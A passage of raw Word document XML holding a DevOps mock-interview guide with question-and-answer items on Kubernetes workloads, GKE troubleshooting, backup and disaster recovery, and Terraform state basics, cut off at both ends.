        <w:t>A: The control plane consists of the API server (the front door for all cluster interactions), etcd (stores cluster state), the scheduler (assigns pods to nodes), and controller managers (reconcile actual state toward desired state). Worker nodes run the kubelet (talks to the API server and manages containers on that node), a container runtime, and kube-proxy (handles Service networking) - together the control plane decides what should run and workers actually run it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Kubernetes workload objects: What are Pods, Deployments, ReplicaSets, StatefulSets, and DaemonSets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Pod is the smallest deployable unit, one or more containers sharing network/storage; a ReplicaSet ensures a specified number of identical pod replicas are running; a Deployment manages ReplicaSets and adds rolling update/rollback capability on top; a StatefulSet is like a Deployment but gives pods stable identity and storage for stateful applications; a DaemonSet ensures exactly one pod runs on every (or a selected subset of) node, typically for node-level agents like log collectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. StatefulSet vs Deployment: What is the difference between StatefulSet and Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment treats its pod replicas as interchangeable and stateless - any replica can be replaced without consequence. A StatefulSet gives each pod a stable, unique network identity and a persistent volume tied to that specific pod ordinal, so replacing pod-1 gets the same identity and storage back, which is required for workloads like databases where identity and data continuity matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Kubernetes Service types: What is a Service, and how do ClusterIP, NodePort, and LoadBalancer differ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Service provides a stable network endpoint and DNS name that load-balances traffic across a set of pods matching a label selector, decoupling clients from individual pod IPs that change as pods are rescheduled. ClusterIP (the default) is only reachable inside the cluster; NodePort additionally exposes the service on a static port on every node's IP; LoadBalancer provisions an external cloud load balancer (e.g. a GCP Network/HTTPS LB) that routes external traffic to the service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Kubernetes ConfigMaps and Secrets: What are ConfigMaps and Secrets, and when would you use each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ConfigMaps store non-sensitive configuration data (environment variables, config files) that pods can consume as env vars or mounted files; Secrets are structurally similar but intended for sensitive data (though only base64-encoded, not encrypted, by default) like credentials or tokens. Use ConfigMaps for anything safe to view in plaintext, and Secrets (ideally backed by an external secret manager via CSI driver) for anything sensitive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Kubernetes Ingress: How does Ingress work, and what components are involved?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An Ingress resource declares HTTP/HTTPS routing rules (host/path to backend Service mappings), but it's inert on its own - an Ingress controller (nginx-ingress, GKE's native controller, etc.) watches Ingress resources and configures the actual load balancer or proxy to implement those rules, so traffic flows from the external load balancer through the ingress controller to the matching backend Service and finally to pod endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Kubernetes rolling updates: How do you perform rolling updates and rollbacks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment's rolling update strategy replaces old pods with new ones incrementally (controlled by maxSurge/maxUnavailable settings) so the service stays available throughout, triggered automatically when you update the Deployment's pod template (e.g. a new image tag). Rollback is `kubectl rollout undo deployment/&lt;name&gt;`, which reverts to the previous ReplicaSet's pod template using the same rolling mechanism, and `kubectl rollout history` shows available revisions to roll back to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Kubernetes probes: How do liveness and readiness probes work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A liveness probe checks whether a container is still functioning; if it fails repeatedly, Kubernetes restarts the container, since something has likely deadlocked or crashed internally. A readiness probe checks whether a container is ready to receive traffic; if it fails, Kubernetes removes the pod from Service endpoints (without restarting it) until it passes again, which is useful for temporary states like warming a cache or waiting on a dependency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 17 - GKE Troubleshooting and Reliability Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. CrashLoopBackOff: A pod is continuously restarting. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run `kubectl describe pod` to see recent events and the last exit code, and `kubectl logs &lt;pod&gt; --previous` to see what the crashed container actually printed before dying. An exit code of 137 usually means OOMKilled (raise memory limits or fix a leak), other application-specific exit codes point to a code-level crash, and a probe-induced restart shows up as a failed liveness probe in the events rather than an application crash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Pending pods: How do you troubleshoot Pending pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run `kubectl describe pod` and read the scheduling event message, which almost always states the exact reason - insufficient CPU/memory across all nodes, no node matching a required affinity/taint, or an exhausted ResourceQuota in the namespace. Check node capacity and current allocation with `kubectl describe nodes`, and verify cluster autoscaler is enabled and has room to add capacity if the issue is genuinely insufficient cluster-wide resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Kubernetes node failure: What happens when a node fails, and how do workloads recover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubernetes detects a node has stopped reporting heartbeats after a timeout and marks it NotReady, then after a further grace period, evicts the pods that were running on it. The controllers managing those pods (ReplicaSet, StatefulSet, etc.) notice the pods are gone and create replacements, which the scheduler places on healthy nodes - recovery is automatic as long as sufficient cluster capacity exists elsewhere, though workloads without a PodDisruptionBudget or multiple replicas can experience a brief availability gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. GKE Cluster Autoscaler: How does Cluster Autoscaler work in GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cluster Autoscaler adds nodes when pods cannot be scheduled because of insufficient resources and removes underutilized nodes when workloads can be safely rescheduled. It respects node pool limits, pod disruption budgets, taints, affinity, and scheduling constraints. It is useful for cost optimization, but workloads must have accurate requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. GKE cluster upgrade: How do you upgrade a GKE cluster safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Upgrade the control plane first (GKE manages this with minimal disruption, especially for regional clusters with multiple control plane replicas), then upgrade node pools using surge upgrades so new nodes are created and workloads migrated before old nodes are removed. Ensure every workload has a PodDisruptionBudget to protect availability during the node drain, test the upgrade in a non-production cluster first, and schedule production upgrades during a low-traffic window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Highly available GKE: How would you design a highly available GKE architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a regional cluster (control plane replicated across multiple zones) rather than zonal, spread node pools across multiple zones within the region, and ensure workloads run multiple replicas with anti-affinity or topology spread constraints so a single zone failure doesn't take down all instances of a service. Add PodDisruptionBudgets, readiness probes that accurately reflect health, and, for the highest availability tier, consider a multi-region architecture with global load balancing and failover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Production Kubernetes security: How would you secure a production Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enforce RBAC scoped to least privilege per team/service account, use Workload Identity instead of mounted keys, enable NetworkPolicies with default-deny, run admission controls (Gatekeeper/Kyverno) to enforce non-root containers and resource limits, enable Binary Authorization for verified image deployment, and keep audit logging enabled with alerting on suspicious API activity. Layer this with regular vulnerability scanning of images and nodes, and restrict who has direct cluster-admin access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Disaster recovery: How would you implement disaster recovery for a production platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define RTO/RPO targets based on actual business impact, implement automated, tested backups (and for critical data, continuous replication if RPO requires near-zero data loss), and design the architecture to support failover to a secondary region if the SLA requires it. Most importantly, actually test the recovery procedure regularly with real restore/failover drills, since an untested DR plan is not a proven capability - it's a hope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. In GKE, can you take a direct etcd backup like a self-managed Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In standard managed GKE, Google manages the control plane, including etcd, so you do not SSH into control-plane nodes or run direct etcdctl snapshots yourself. For backup and recovery, focus on backing up Kubernetes resources, persistent volumes, cluster configuration, GitOps/IaC state, and application data. Use Backup for GKE or tools like Velero/Kasten where appropriate, and keep Terraform/Git as the source of truth for cluster and workload configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you design backup and restore for a production GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by separating what must be recovered: cluster configuration, Kubernetes manifests, secrets, persistent volumes, databases, object storage, and external dependencies. Keep infrastructure in Terraform, workloads in GitOps, secrets in Secret Manager or a controlled secret workflow, and use Backup for GKE or Velero/Kasten for Kubernetes resources and persistent volumes. Define RTO/RPO, backup frequency, retention, encryption, cross-region storage, restore ownership, and run regular restore drills into an isolated cluster or namespace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What is Backup for GKE, and what problem does it solve?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Backup for GKE is Google Cloud's managed backup service for GKE workloads. It helps protect Kubernetes resources and persistent volume data, supports backup plans and restore plans, and reduces the need to build a custom backup controller stack. It is useful for restoring deleted namespaces, workloads, configuration, and stateful workload volumes, but it should still be tested with real restore drills and paired with application-aware database backups where needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Scenario: A namespace with production workloads is accidentally deleted in GKE. How would you recover it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First stop any automation that might keep deleting or overwriting resources, then assess whether the namespace was managed by GitOps, Terraform, Helm, or a backup tool. Restore manifests from GitOps or Helm history where possible, restore Kubernetes resources and persistent volume data from Backup for GKE or your backup platform, and validate secrets/config maps, service accounts, ingress, network policies, and PVC bindings. After recovery, add guardrails such as RBAC restrictions, deletion protection, policy checks, and a break-glass approval flow for high-risk deletes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How do you test whether a GKE backup is actually restorable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run scheduled restore drills, not only backup-success checks. Restore into a non-production namespace or temporary cluster, verify Kubernetes objects are recreated, PVC data is mounted, Pods become Ready, services route correctly, secrets and service accounts work, and application-level validation passes. Measure actual recovery time and data loss against RTO/RPO, document gaps, and automate the restore test where possible so backup quality is continuously proven.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do you take and restore an etcd snapshot in self-managed Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For self-managed clusters where you operate etcd, use etcdctl snapshot save with the correct endpoints, CA, cert, and key, then verify it with etcdctl snapshot status. Store snapshots encrypted and off-cluster. To restore, stop the API server/control-plane components, restore the snapshot with etcdctl snapshot restore into a new data directory, update etcd configuration if member names or peer URLs changed, restart etcd and the API server, then validate cluster state and controller health. Always rehearse this in a test cluster before relying on it in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 18 - Terraform Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Terraform state basics: Explain Terraform state and why it is important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform state is a file (local or remote) that maps the resources declared in your configuration to the real infrastructure objects Terraform created, tracking metadata and current attribute values. It's important because Terraform uses it to determine what needs to change on the next apply (diffing desired config against last-known state), and without accurate state, Terraform cannot reliably know what already exists or safely plan updates without risking duplicate or conflicting resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform remote state: What is remote state, and why do teams use it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Remote state stores the state file in a shared backend (GCS bucket, Terraform Cloud) instead of a local file on one developer's machine, so the whole team works against the same source of truth. Teams use it to enable collaboration (everyone's plans/applies see the same current state), state locking to prevent concurrent conflicting applies, and to keep sensitive state data out of version control while still being securely accessible to CI/CD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Terraform state locking: How do you handle state locking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a backend that supports native locking (GCS with a lock mechanism, or Terraform Cloud/Enterprise) so that when one operation (plan or apply) is running against a workspace, a second concurrent operation is blocked rather than racing and potentially corrupting state. If a lock gets stuck (e.g. a crashed CI job left it held), `terraform force-unlock` can release it manually, but only after confirming no other operation is genuinely still in progress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Terraform count vs for_each: What is the difference between count and for_each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: `count` creates N nearly-identical resource instances indexed numerically (0, 1, 2...), which can cause unwanted resource recreation if the list order changes since instances are tracked by index. `for_each` iterates over a map or set of strings, tracking instances by a stable key rather than index, so adding/removing an item in the middle doesn't cause unrelated resources to be destroyed and recreated - `for_each` is generally preferred for anything beyond simple, order-independent repetition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Terraform modules: What are modules, and how do you use them for reusable infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
